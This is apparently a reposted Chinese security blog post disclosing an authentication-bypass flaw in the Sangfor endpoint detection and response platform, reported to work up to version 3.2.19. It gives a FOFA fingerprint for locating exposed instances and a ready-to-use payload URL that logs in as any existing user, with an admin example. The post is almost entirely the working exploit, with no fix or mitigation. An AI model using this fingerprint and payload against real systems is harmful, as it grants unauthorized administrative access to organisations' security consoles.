深信服-SANGFOR终端检测响应平台-任意用户登录

2022年1月6日01:03:16评论204 views字数 251阅读0分50秒阅读模式

前两天爆出来的命令执行，今天在给大家爆一个任意用户登录；
看源码看到的，我测试的时候可以打到3.2.19版本，后面的版本我就不知道了；

fofa指纹：title=”SANGFOR终端检测响应平台”

漏洞利用：

只要用户存在就可以登陆

payload：

1	https://ip/ui/login.php?user=需登录的用户名

列如：

1	https://1.1.1.1:1980/ui/login.php?user=admin

查询完毕以后即可登录平台。

FROM :ol4three.com | Author:ol4three

本文由 admin 发表于 2022年1月6日01:03:16
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
深信服-SANGFOR终端检测响应平台-任意用户登录https://cn-sec.com/archives/720890.html

php Thread实例